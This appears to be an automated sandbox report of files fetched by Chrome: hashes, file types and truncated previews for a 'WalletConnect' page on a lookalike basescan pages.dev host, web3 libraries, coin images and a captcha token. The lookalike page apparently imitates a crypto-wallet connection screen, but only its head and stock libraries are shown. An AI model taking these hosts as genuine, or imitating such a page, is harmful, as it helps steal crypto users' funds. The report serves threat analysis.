                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (4246)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):5253
                                                                                                                                                                                                                                              Entropy (8bit):5.076537494513766
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:UID+rHG5iCTZ1iLNB3KApPzRZvsYan94vnYnRufj/RTznRGiRvJ88GeO:Uy+jVCTZybfplNR1n8uLLGw68GeO
                                                                                                                                                                                                                                              MD5:8159A15CB8648BAED35579A71DF0DAFE
                                                                                                                                                                                                                                              SHA1:408DB772D779350F589698F96AFA5D529CB37854
                                                                                                                                                                                                                                              SHA-256:250B910ED0DA1540709E008B35CBBC88EB8BE7C935331C2CFBD1DB00A1215EA6
                                                                                                                                                                                                                                              SHA-512:16FE292716944518D2C4BF066F66493CE7C8A893AB6B7D265DC629A61978608B721468D6837898D2C7191B3DF7D46D374C677DB1AFF45346EB686B5E832E1D68
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/workbox-window.prod.es5-Cr_0OO2S.js
                                                                                                                                                                                                                                              Preview:try{self["workbox:window:6.6.0"]&&_()}catch{}function S(t,o){return new Promise(function(e){var i=new MessageChannel;i.port1.onmessage=function(f){e(f.data)},t.postMessage(o,[i.port2])})}function W(t,o){for(var e=0;e<o.length;e++){var i=o[e];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function E(t,o){(o==null||o>t.length)&&(o=t.length);for(var e=0,i=new Array(o);e<o;e++)i[e]=t[e];return i}function k(t,o){var e;if(typeof Symbol>"u"||t[Symbol.iterator]==null){if(Array.isArray(t)||(e=function(f,d){if(f){if(typeof f=="string")return E(f,d);var h=Object.prototype.toString.call(f).slice(8,-1);return h==="Object"&&f.constructor&&(h=f.constructor.name),h==="Map"||h==="Set"?Array.from(f):h==="Arguments"||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(h)?E(f,d):void 0}}(t))||o){e&&(t=e);var i=0;return function(){return i>=t.length?{done:!0}:{done:!1,value:t[i++]}}}throw new TypeError(`Invalid attempt to iterate non-iterable inst
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1254
                                                                                                                                                                                                                                              Entropy (8bit):7.817227192891971
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:TTQ6p4PpHy/noqXgGBJ3jSHmJ/TLEufRk/xdMr+hdBDN/kQUQEqhm8yu0BZ2rnIL:pmHonxJzQ+TLEufRk/MrA3x/kHQEt8Yt
                                                                                                                                                                                                                                              MD5:0AE306DAE6C1A28E072CD2461DA4D416
                                                                                                                                                                                                                                              SHA1:CE4F77AC9E6EDEF5CCFCB87BBA4E110F6A6E922C
                                                                                                                                                                                                                                              SHA-256:3035420E211AABE1DA983DB1E580A39BC5CCF8418E6A66468CC9ABF1537079FC
                                                                                                                                                                                                                                              SHA-512:087FDE1E36960CF2C443D109C700DC7E70D1D1B2E6536D543197AFFCBF39C995A3135B4CE377426339C5AB9B4484F39CA2A560D54A54DC0EF904005A7EB7C7E2
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/coin/XRP.black.png
                                                                                                                                                                                                                                              Preview:RIFF....WEBPVP8L..../c...UP..d./}.k..m.m.........<.kVf..[..6$Y{...{7..A...%....Oy.\!#....n...I....c...jxA....=2.J...|...GD8..J&."..I..V..4Y$....i..5..p....C.0.....r.LW0M..V...^...@o4.X....+.Ba..:.2...b>..x........0.:.....O.....xo=p`.....|.....'.....8T.?...Z..G*.J.j..p..Y....../..... B.=..J.:.Nv..g:.^,.Nv>......myU.e.b.sD2.mU....`I.Nb@?.^u..4...._[J.........0,&.N........R2v:^P.B.VIvIZ...^E..]H.{V..*..1#....,w.#..*..zH.ltm]..d....!U...L....f..........4.G.xF...~......p.F....a....?......%.#H..S.Id.:..{...6G.D...U.\I...<....0.Em.RA.!&Ja...5..o.........!w_d.q..d... ...a..\F.~.iN...B4w|B.F..X...d^.n.....J..m."..FJ-.j~h..".....y....o..r....Y.p...{.D0P......n...eT..<...1Pr...&.>q...}.Lg.{l..'C.,..N.......N3.....,W....p..O.g..}<S...{.PV..~......G.fR$.....u{....~..AA.F}..;.bR..{Q.f.Y...V..(...Um..p1.&.....nv.....:..U..."6:X....p/.g_r...a..n..Y.F..s....g...~%...zn.R{`..............z...'...[....9It.>.uZ..$.V.v.4...G+x`1=G.n..'1.p.......{F0...A"..VN..
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/website.html
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1374
                                                                                                                                                                                                                                              Entropy (8bit):7.8245642793165615
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:nmdlJ93xxXmskJUGGGevj2KrMPGnicmB10+F79/Rcy/cZHFyX3KNsWdy30Xn:olJdxxeRGGuNoOoDldgHMX3ygK
                                                                                                                                                                                                                                              MD5:97F4A465144FF514799BAE8F849BE3DD
                                                                                                                                                                                                                                              SHA1:669E43B6B350BBDC9E7E4A0253E0ACF65D3204B6
                                                                                                                                                                                                                                              SHA-256:E9FBA52FE829D66387A7F0E3238276513474BDAFFF19502BA7C702C82E647365
                                                                                                                                                                                                                                              SHA-512:D235EC5CC6A01C97FF0274CE8E7F8B6495654DF058E80217042CB0C1FEF487623E8A6B563C7534A95CECADA052E6C4D5D7F7A3426B60282BEA3F07067824940B
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/coin/ETH.black.png
                                                                                                                                                                                                                                              Preview:RIFFV...WEBPVP8LI.../c.....$G....O6w..`..#.}.....q.I..d.......5,.b.q.I.....[.c.`......55.*.....?...K-.....y.Pe.>.5......5JW=.G*.7.L..$&.EF......*t.yr.8+{.Yy..8..`..g.g...{...|K|V......*..}U..I...k.0eB.4.....`./x..&....8...p... ..\`.....'...........mO..23..Lcf.%Q`.6.L.?.d...}..?..m$I.6..H{..tRU/0`....{;.y.P~sg.\._.wJ..~.).....nO*......n..[....N.J9.R.t.mt..:.2..1.J......A..........Gy.M.#.7.L..o \n3...p..i.S2..v.T8&R.../..u..r<. ...)..l[...M..K.....4.d.>7..M.^w.cz..U@..c...$p.......f.....<.........2...&...3.....0?.n[` ..TH.ZN.s.i..i..)....a,&....d..,B..b.$..@,.w..PBYH.C.o_.@..Lb*.k.*..<&..R.S...BBw.d..m...B.w.!t.P.Y(..@P...Y......@..$.....:.e.Lk8...0.1...9...QDX......+..xL.p.U...x........k`.x.9...[pH...H...f./..4....Hv..&G...<\...."50j.".....I.7o..oJ4.E...e.J.by.EKc..|....-.K.TG...Nu.KX.....<..1M...nR#..Me.>.@...G0|}..v..G.V..=.v.M.0.O+.o|g..#.\..b....4k..M.ae......M+..OgI..Fn.....a..&?&m.Gjuj.o.%_....#".&.fm..(.W.1...<e.~....d.m...."....&....lx.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/style.css
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):4412
                                                                                                                                                                                                                                              Entropy (8bit):7.936505818182613
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:+zQVRrxq8JywpNoad+gCMXY1HqKQPBFnZ2soYoUINpva91aYeVjC30/:pr1qwygUzwKMFnc1Rpva91afVjoy
                                                                                                                                                                                                                                              MD5:E26BDEC2A842132EC688ED6584853D4B
                                                                                                                                                                                                                                              SHA1:94C5A4859F4D3D5DF794A4BF90A4AC876026E15D
                                                                                                                                                                                                                                              SHA-256:AE785241CE0047AEB8DE19A5FA871C94C002D41E60338FE7E37F7B0BFEB929DA
                                                                                                                                                                                                                                              SHA-512:C6728D79045E58FCF68B00B94F24CCC66FBE576D3C6BA61E1CDCD4D9FD95364FEFD535DFA8D5080F34FE90871DD8F45B70C9C96028344D0C4B1CDD08DD4AC7D4
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://api.web3modal.com/getWalletImage/7677b54f-3486-46e2-4e37-bf8747814f00
                                                                                                                                                                                                                                              Preview:RIFF4...WEBPVP8X..............ALPH|........!7.;..]m..m.Y....m..Am.qR....8....L."b.@.>E[.....'..H......6;.yQ_p.~..9.BF.._.[9......{.+..|ma;..pm:3.I8uN.7g .>iF2....9Z.......;..}..:%B.(.}.!Q.....U.H...s.x...2.Uc..H.{Ji.C..xf....H._....|..&$...)P..$$...j.#H.G.*I.H..A...C.....$..*LB...X...uU.\.......% ...P".I........Zv.'".'..3.....y.....I..m.....2.Yp...sx .`-..p....\p..R3d..V..R.........@F...jNX...{.........z.Q....xa3H7x.J@..t.\^.............t...epC.Snx..>...............................-~./..i*7d...&n0......!..r;.~..oJ.\.k....6.D.B.@=3'.....p.=........8../.....|..R>X..[.A3K^...%...!`...9.......6....9.m...0.l6......0...v.'P_..=P.....O...P.. .%.).e....r.l.oT'w..'P.$P~).....Q.>.5 (...%P.p...Am}..%.A.@...$..R:[.....Bcr.h.C&.ev.-..C_.R.m....2..4_.DY.*...=oR.........-.......)...uC..td>9X.'..`N*...l...R.n.5.v.^..F......^..#.8.fL5?p.~....v:..;.1..r..Yc[...M.VP8 .....^...*....>I$.F".?...x;...gn.c....@Q.....~..u{wo......W...;..
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/style.css
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators, with escape sequences
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):904694
                                                                                                                                                                                                                                              Entropy (8bit):5.648653033680158
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:B+E3jK8oCNvmsedKTgMqXhCcbb0IoFabtIG7PQQNvri8pX6rFzcdmPu:BpjoamsSKtQhCs0nFywrqZ
                                                                                                                                                                                                                                              MD5:4FB156333811FA50FF75F934F625226B
                                                                                                                                                                                                                                              SHA1:B83AF88F81EC4A4E15687F7F576A5F1EAD25321D
                                                                                                                                                                                                                                              SHA-256:D1BFA69432D9B4419FDC418E0BD102F21F5629A3D78237B9518755E683FD97DD
                                                                                                                                                                                                                                              SHA-512:299EDA4264A81475337B1214120940F91B1E5D0FC85EB7CD31C1989368698C684402AB13EF46F7F389D34F6083E80362538E0B24A24B82B26386D800800B0A11
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:!function(e){if("object"==typeof exports&&"undefined"!=typeof module)module.exports=e();else if("function"==typeof define&&define.amd)define([],e);else{("undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:this).Web3Eth=e()}}(function(){var define,module,exports;return function o(a,s,u){function c(t,e){if(!s[t]){if(!a[t]){var r="function"==typeof require&&require;if(!e&&r)return r(t,!0);if(f)return f(t,!0);var n=new Error("Cannot find module '"+t+"'");throw n.code="MODULE_NOT_FOUND",n}var i=s[t]={exports:{}};a[t][0].call(i.exports,function(e){return c(a[t][1][e]||e)},i,i.exports,o,a,s,u)}return s[t].exports}for(var f="function"==typeof require&&require,e=0;e<u.length;e++)c(u[e]);return c}({1:[function(e,t,r){"use strict";t.exports=e("./register")().Promise},{"./register":3}],2:[function(e,t,r){"use strict";var o="@@any-promise/REGISTRATION",a=null;t.exports=function(n,i){return function(e,t){e=e||null;var r=!1!==(t=t||{}).global;if(null===a&
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 200 x 267, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):41578
                                                                                                                                                                                                                                              Entropy (8bit):7.99299123627522
                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                              SSDEEP:768:+tfSC/8+BOGwuXc8Gcm0n8QMvUtk1dRI5VdxJOhCXn/22Y4wha2wR3kLZlIA5QeH:+A90OGwcvF8QMMeRIL/JOIP2ZW6
                                                                                                                                                                                                                                              MD5:B3A939E7A2A1357FE7912F0EEC56FCBA
                                                                                                                                                                                                                                              SHA1:10EB1064F89F56FD9B02830139D10559F16EB7BB
                                                                                                                                                                                                                                              SHA-256:3C528A7DB7605C6A56DD8F4FC3D0B25AA607C845ED5C4BA2CAFDE06E93C72F40
                                                                                                                                                                                                                                              SHA-512:A463D5CF52776491AD595A2F08A6A530C9F20C8A5A2AF228FEC08FBE6A57D3E30F064CEB4BC0FA12B428866009448A536F1738FED09FD3F85C694F800B3FC988
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR..............1^g....sRGB....... .IDATx^.}....wu....6.].....e@....al0..............s.3>.s8l.&g.$....rN.+m./.L....I/....?.........wUuuu....<.Mg.N.X....d.Y`.M.%....tZ.Y`.M.%....tZ.Y`.M.%....tZ.Y`.M.%....tZ..X..~.2gSN.....w........4y2...M.$.DR.18.....R..."..y..g.H.I.|q...d....w..0....Z.......Y.u..?.|....L].~o....X.'...[v..+.%g....c."w^......lpP..,..O.`{v..T>p.....w..>.DM4."..~...>.....7T..'.:...W.vhkh,.....6?....s.........k..5......D0..J."`..u....[.JV......3.....$=.(.......M.xv...:..v..{...0..w....E..t.?..R...G.x,.F...$.NQB.L.`..;.^4......;.\.\.......n.3.T...J0A..}....0f.;..I|........e...NR.. .....{n......t../o\J......q..a..;t.....,.<......!.1=....zo....-..t....w8.>a[.)H.F.d.....6U...>....?..Vy..........u{(...(...^.Luc.L.qd1H.\}.z....(T........d.....W.e.2.pj`...V.St.:...XXc.;}.....`VV.?r......FH..e.-s...@.A..i|...Ir..._..'e.g......[....PNVgw.n.w6!.Q.]=u.; ..-....F..3....._v..:.F5..4.GF.|g.X.....W.}...+..a4...6ww}./+&.....Ig.A.~b.....z
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.html
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):174103
                                                                                                                                                                                                                                              Entropy (8bit):5.441939866913145
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3072:ev+5y7XWGSGbvn5RMbOJdZz88cYgSGbvC:ev+5W5ReOJdZ4zYF
                                                                                                                                                                                                                                              MD5:80A9C511F2F68CE3670BF36EFAC37324
                                                                                                                                                                                                                                              SHA1:2CB66F3CFACD9DBCDDD28472B118C551C6C13EEB
                                                                                                                                                                                                                                              SHA-256:5B797D764D3F2E300A2C14B61C812EA5ED272098A0FF2BAC1E4FC65E304C6AD4
                                                                                                                                                                                                                                              SHA-512:0A400B73AA65CD9B040C4033059857067CF05FEFCD6EFDD41BBD1C38CC16D109595953CF54BB5CAACF05CBE9D3940417CB69090E7D545E46956612B71FD8933F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:!function(t){if("object"==typeof exports&&"undefined"!=typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{("undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:this).Web3Utils=t()}}(function(){return function o(u,s,h){function a(r,t){if(!s[r]){if(!u[r]){var i="function"==typeof require&&require;if(!t&&i)return i(r,!0);if(f)return f(r,!0);var e=new Error("Cannot find module '"+r+"'");throw e.code="MODULE_NOT_FOUND",e}var n=s[r]={exports:{}};u[r][0].call(n.exports,function(t){return a(u[r][1][t]||t)},n,n.exports,o,u,s,h)}return s[r].exports}for(var f="function"==typeof require&&require,t=0;t<h.length;t++)a(h[t]);return a}({1:[function(t,r,i){"use strict";i.byteLength=function(t){var r=p(t),i=r[0],e=r[1];return 3*(i+e)/4-e},i.toByteArray=function(t){for(var r,i=p(t),e=i[0],n=i[1],o=new c((a=e,f=n,3*(a+f)/4-f)),u=0,s=0<n?e-4:e,h=0;h<s;h+=4)r=l[t.charCodeAt(h)]<<18|l[t.charCodeAt(h+1)]<<12|l[t.charCod
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):776
                                                                                                                                                                                                                                              Entropy (8bit):5.842969181375562
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:Y2+S5HXnREr2KRf7RRFRdFjG0Kt2dZqqEshEuA0Dx:Y2+m82KRfVRbfegdNEshM4
                                                                                                                                                                                                                                              MD5:8338967F6EECBF982401EA7E3F5A2F9F
                                                                                                                                                                                                                                              SHA1:ECFF3199811F8010461356452B4356F975BCA49A
                                                                                                                                                                                                                                              SHA-256:11D670C09DA095DFFD393CF1F68EC6D7B8205BE9D2F72E186AD1DB765B1C8C7C
                                                                                                                                                                                                                                              SHA-512:43550ED185EC45053E13A75372E2117CCEAD223DF01E10FFB7015889F55284C87E7691C13D52AC59AE90923B544799C7818C8F4C77A2F8548AA5110C9AD78DCF
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:{"features":{"enc_get_req":true},"c":{"type":"hsw","req":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmIjowLCJzIjoyLCJ0IjoidyIsImQiOiIrK2ZlYVJzcCtlZksrVk9DUWxLaFhGWWFJTHNOQ3NrR1BDMzBRdFJITU1xTm9iMDBneHZwZ2NDcGFBMzlpWXRKQlFYSzdGSE9NWHRmUytYclB1R0RqTGZNcDRyeGgzZjZpbHgwQmZMd0hJek95Q3hKSTdjZjdDTWU5c05qZW8wY0l1eUw1dk5zZURSeC9TV3JLV00yWUczUDdNOU50QWh0bkN2TTJISHlZcWNGVHhsbCtVaG9hWlhSb0Q4ZGVNUkhwSE95YituK0t1WTBQczlPOWM4TC9EZEJJdTF0OXVxN21VSWg1MDhmK1VMNXRSbC9sa0c2eWE3SzdrRmphZmc9YjkxaHBLTEtwVFdLczdVTSIsImwiOiIvYy9jMmUzYmQ4YzFhOWFhYzkzNDkwZmI2ZjY2NDU2NTdiNTQ2NmI1YjkyOGIxYmNmMjEwOWE3YTllMWYyMWUzNWJlIiwiaSI6InNoYTI1Ni1hVGFnQlI5c0ljcytWZzlHS0dHYWdMYkczUEZzQ3U3ZlJkRkxpa3N5UHJVPSIsImUiOjE3Mjc0ODY1OTEsIm4iOiJoc3ciLCJjIjoxMDAwfQ.Sltez93Aq3PNlAMMiVwHZzUTyvzXOq-I7KRxFWK8Ygg"},"pass":true}
